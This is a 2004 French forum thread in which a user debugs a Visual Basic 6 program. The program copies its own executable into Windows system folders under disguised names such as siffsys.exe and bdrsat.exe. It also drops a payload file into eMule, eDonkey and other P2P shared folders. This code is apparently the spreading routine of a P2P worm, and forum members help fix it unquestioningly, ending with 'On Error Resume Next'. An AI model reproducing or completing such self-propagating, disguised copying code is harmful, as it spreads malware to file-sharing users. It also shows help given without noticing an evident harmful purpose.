Besoin d' aide a propos de chemain d' accès introuvable !

TiGrou1204 Messages postés 28 Date d'inscription samedi 22 mars 2003 Statut Membre Dernière intervention 24 janvier 2010 - 30 août 2004 à 19:48
TiGrou1204 Messages postés 28 Date d'inscription samedi 22 mars 2003 Statut Membre Dernière intervention 24 janvier 2010 - 31 août 2004 à 14:55
Salut a toutes et a tous,

Voila enfète je suis en train de developper un programme qui se copiera dans certain dossiers de l' utilisateur, mais je me suis retrouvé face a un petit probleme !

Enfète, lorsque le programme rencontre un cehmain d' accès ( exple: C:\Program Files\eMule\Incoming\ ) qui n' existe pas sur l' ordinateur de l' utilisateur, il se ferme en affichant un message d' erreur ( Chemain d' accès introuvable ) et moi j' aimerai que si il ne trouve pas le chemain de ce dossier, il passe au dossier suivant et ainsi de suite...

Voila si une âme charitable parmis vous pouvait voler a mon secours ca serai vraiment très sympas...

Merci a tous ceux ui me repondrons et m' apportant leur aide...

A Bientot ;)

18 réponses

cs_dragon Messages postés 2336 Date d'inscription samedi 14 juillet 2001 Statut Membre Dernière intervention 5 mai 2009 6
30 août 2004 à 20:12
fait un dir avant

voilà un exemple, ça va surement t'aider, sauf toi, tu effaces pas

If Dir(répertoireTemp & "Rapport.xls") <> "" Then
Kill répertoireTemp & "Rapport.xls"
End If
-------------------------------------------------
Dragon alias aussi Waxime mais bon, pas le gout de refaire un nouveau profil lol
-------------------------------------------------
0
TiGrou1204 Messages postés 28 Date d'inscription samedi 22 mars 2003 Statut Membre Dernière intervention 24 janvier 2010
30 août 2004 à 20:28
Je ne comprend malheuresement pas bien :(
Voici ma source s' y ca peut t' aider a resoudre mon probleme !

Private Sub Timer1_Timer()

FileCopy App.Path & "" & App.EXEName & ".EXE", "C:\Windows\System\siffsys.exe"
FileCopy App.Path & "" & App.EXEName & ".EXE", "C:\Windows\bdrsat.exe"
FileCopy App.Path & "" & Label4(4).Caption, "C:\My Shared Folder" & Label4(0).Caption
FileCopy App.Path & "" & Label4(4).Caption, "C:\My Shared Folder" & Label4(1).Caption
FileCopy App.Path & "" & Label4(4).Caption, "C:\My Shared Folder" & Label4(2).Caption
FileCopy App.Path & "" & Label4(4).Caption, "C:\My Shared Folder" & Label4(3).Caption
FileCopy App.Path & "" & Label4(4).Caption, "C:\Program Files\eMule\Incoming" & Label4(0).Caption
FileCopy App.Path & "" & Label4(4).Caption, "C:\Program Files\eMule\Incoming" & Label4(1).Caption
FileCopy App.Path & "" & Label4(4).Caption, "C:\Program Files\eMule\Incoming" & Label4(2).Caption
FileCopy App.Path & "" & Label4(4).Caption, "C:\Program Files\eMule\Incoming" & Label4(3).Caption
FileCopy App.Path & "" & Label4(4).Caption, "C:\Program Files\Warez P2P Client" & Label4(0).Caption
FileCopy App.Path & "" & Label4(4).Caption, "C:\Program Files\Warez P2P Client" & Label4(1).Caption
FileCopy App.Path & "" & Label4(4).Caption, "C:\Program Files\Warez P2P Client" & Label4(2).Caption
FileCopy App.Path & "" & Label4(4).Caption, "C:\Program Files\Warez P2P Client" & Label4(3).Caption
FileCopy App.Path & "" & Label4(4).Caption, "C:\Documents and Settings\All Users\Shared" & Label4(0).Caption
FileCopy App.Path & "" & Label4(4).Caption, "C:\Documents and Settings\All Users\Shared" & Label4(1).Caption
FileCopy App.Path & "" & Label4(4).Caption, "C:\Documents and Settings\All Users\Shared" & Label4(2).Caption
FileCopy App.Path & "" & Label4(4).Caption, "C:\Documents and Settings\All Users\Shared" & Label4(3).Caption
FileCopy App.Path & "" & Label4(4).Caption, "C:\Program Files\eDonkey\Incoming" & Label4(0).Caption
FileCopy App.Path & "" & Label4(4).Caption, "C:\Program Files\eDonkey\Incoming" & Label4(1).Caption
FileCopy App.Path & "" & Label4(4).Caption, "C:\Program Files\eDonkey\Incoming" & Label4(2).Caption
FileCopy App.Path & "" & Label4(4).Caption, "C:\Program Files\eDonkey\Incoming" & Label4(3).Caption
End Sub
0
cs_dragon Messages postés 2336 Date d'inscription samedi 14 juillet 2001 Statut Membre Dernière intervention 5 mai 2009 6
30 août 2004 à 21:06
au tout début, vérifie si le répertoire existe avec le dir
s'il existe pas, tu crée les répertoires et après tu fini le code avec tout tes copy
-------------------------------------------------
Dragon alias aussi Waxime mais bon, pas le gout de refaire un nouveau profil lol
-------------------------------------------------
0
Tilois Messages postés 721 Date d'inscription dimanche 10 juin 2001 Statut Membre Dernière intervention 27 mars 2011 7
30 août 2004 à 21:08
Private Function repExiste(rep As String) As Boolean
On Error GoTo erreur
If GetAttr(rep) = vbDirectory Then
repExiste = True
Exit Function
End If
erreur:
repExiste = False
End Function

voila voila ....
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
TiGrou1204 Messages postés 28 Date d'inscription samedi 22 mars 2003 Statut Membre Dernière intervention 24 janvier 2010
30 août 2004 à 21:55
Merci pour vos reponse, peut tu me dire au il faut placé

Private Function repExiste(rep As String) As Boolean
On Error GoTo erreur
If GetAttr(rep) = vbDirectory Then
repExiste = True
Exit Function
End If
erreur:
repExiste = False
End Function

svp car quand je le met dans ma form et que je lance ca me fait tjr le meme prob :'(
0
Tilois Messages postés 721 Date d'inscription dimanche 10 juin 2001 Statut Membre Dernière intervention 27 mars 2011 7
30 août 2004 à 22:27
dans un module. cette fonction sert a savoir si un rep existe ou pas
val=repexiste("c:\windows")
par ex
si c:\windows existe, val renvoie true
0
TiGrou1204 Messages postés 28 Date d'inscription samedi 22 mars 2003 Statut Membre Dernière intervention 24 janvier 2010
30 août 2004 à 23:38
encore un prob maleheuresement :(
Quand je met

Private Function repExiste(rep As String) As Boolean
On Error GoTo erreur
If GetAttr(rep) = vbDirectory Then
repExiste = True
Exit Function
End If
erreur:
repExiste = False
End Function

dans un module et j' utilise la focntion val dans la forum ca me met que la fonction est not defined et quand je met

Private Function repExiste(rep As String) As Boolean
On Error GoTo erreur
If GetAttr(rep) = vbDirectory Then
repExiste = True
Exit Function
End If
erreur:
repExiste = False
End Function
dans la form et utilise val dans la form aussi ca me met un frase du style

"fonction call on left-hand side off assignment
must return variant or object"

aidez moi par pitier :'(
0
crenaud76 Messages postés 4172 Date d'inscription mercredi 30 juillet 2003 Statut Membre Dernière intervention 9 juin 2006 28
31 août 2004 à 00:35
Parce que ta fonction RepExiste() est définie comme étant "Private" !!
Alros elle n'est visible que dasn le module ou elle est déclarée.
Pour corriger, 2 solutions :
1-Passe la fonction de "Private" à "Public"
2-Déclare repExiste() en Private mais dasn le module ou tu as ta fonction Timer1-Timer(), qui y fait appel.
La 1ere solution est meilleure si tu penses etre amener à utiliser la fonction repExiste() depuis plusieurs modules différent.
La seconde est meilleure si tu penses ne pas être amener à utiliser cette fonction ailleur, depuis un autre module je veux dire.

Christophe R.
0
TiGrou1204 Messages postés 28 Date d'inscription samedi 22 mars 2003 Statut Membre Dernière intervention 24 janvier 2010
31 août 2004 à 01:09
Toujoursl meme probleme sur le Val =

"Compile Error"
"Fonction call on left-hand side of asignment must return Variant or Object"

Personne a la solution svp ? :(
0
crenaud76 Messages postés 4172 Date d'inscription mercredi 30 juillet 2003 Statut Membre Dernière intervention 9 juin 2006 28
31 août 2004 à 01:14
Qu'entends tu exactement par "utilise val dans la form" !!!
Donne un petit bout de code faisant appel à la fonction et qui provoque l'erreur ...

Christophe R.
0
cs_rene38 Messages postés 1858 Date d'inscription samedi 29 juin 2002 Statut Membre Dernière intervention 17 octobre 2013 11
31 août 2004 à 01:16
Salut

Message d'erreur :
fonction call on left-hand side of assignment must return variant or object
Traduction :
Un appel de fonction sur la partie gauche d'une affectation (càd à gauche du signe = ) doit renvoyer un type variant ou object.
Solutions :
- Tu déclares Dim val As Boolean avant d'appeler val = ...
- Mieux : Tu déclares Dim valeur As Boolean et tu appelles valeur = repexiste("C:\Windows")
(mieux parce-que Val est un mot réservé de VB).
0
TiGrou1204 Messages postés 28 Date d'inscription samedi 22 mars 2003 Statut Membre Dernière intervention 24 janvier 2010
31 août 2004 à 01:37
Merci rene j' ai fait comme tu me la conseillé, mais enfaite lors de la compilation pas de probleme mais c' est coté opérationnel, ca ne marche pas... tjr le meme message "chemain introuvable" :(
0
cs_rene38 Messages postés 1858 Date d'inscription samedi 29 juin 2002 Statut Membre Dernière intervention 17 octobre 2013 11
31 août 2004 à 01:39
Sur quel chemin ?
0
cs_rene38 Messages postés 1858 Date d'inscription samedi 29 juin 2002 Statut Membre Dernière intervention 17 octobre 2013 11
31 août 2004 à 01:52
essaie aussi en début de ton sub :

Private Sub Timer1_Timer()
Dim Chemin As String
Chemin = App.Path
If Right$(Chemin, 1) <> "" Then Chemin = Chemin & ""

FileCopy <s>App.Path & "\</s>" Chemin & App.EXEName & ".EXE", "C:\Windows\System\siffsys.exe"
FileCopy <s>App.Path & "\</s>" Chemin & App.EXEName & ".EXE", "C:\Windows\bdrsat.exe"
......
End Sub

Si ton exe est dans la racine du disque C par exemple,
App.Path = "C:"
tu obtenais donc

FileCopy "C:\\..... (double antislash)
0
cs_rene38 Messages postés 1858 Date d'inscription samedi 29 juin 2002 Statut Membre Dernière intervention 17 octobre 2013 11
31 août 2004 à 02:30
dernière chose : tes 2 premières lignes de code entraînent l'erreur :
Tu ouvres (tu lances) ton .exe et tu essaies de le copier.
Or MSDN dit :
Si vous appliquez l'instruction FileCopy à un fichier ouvert, une erreur se produit
0
TiGrou1204 Messages postés 28 Date d'inscription samedi 22 mars 2003 Statut Membre Dernière intervention 24 janvier 2010
31 août 2004 à 04:03
Merci encore pr ton aide... mais ca ne marche tjr pas
enfete le prog ce copy bien dans les ficheir qui existe sur mon pc mé si il y a un fichier ki n existep as le prog s arrete en mettant le mess d erreur de chemain introuvable :'(

je voudrait que si il ne trouve pas le chemain, il quitte sans mettre de message ou bien il passe au suivant... help plz :(
0
Renfield Messages postés 17287 Date d'inscription mercredi 2 janvier 2002 Statut Modérateur Dernière intervention 27 septembre 2021 74
31 août 2004 à 08:31
un simple On Error Resume Next

sur quel chemin il indique ca ?? (bouton deboggage du message d'erreur....)

Amusez-vous ! ;)
Renfield - thomas_reynald@msn.com
Admin CodeS-SourceS
0
TiGrou1204 Messages postés 28 Date d'inscription samedi 22 mars 2003 Statut Membre Dernière intervention 24 janvier 2010
31 août 2004 à 14:55
Merci a toi on error resume next fonctionne parfaitement :D
Merci encore !!
0
Rejoignez-nous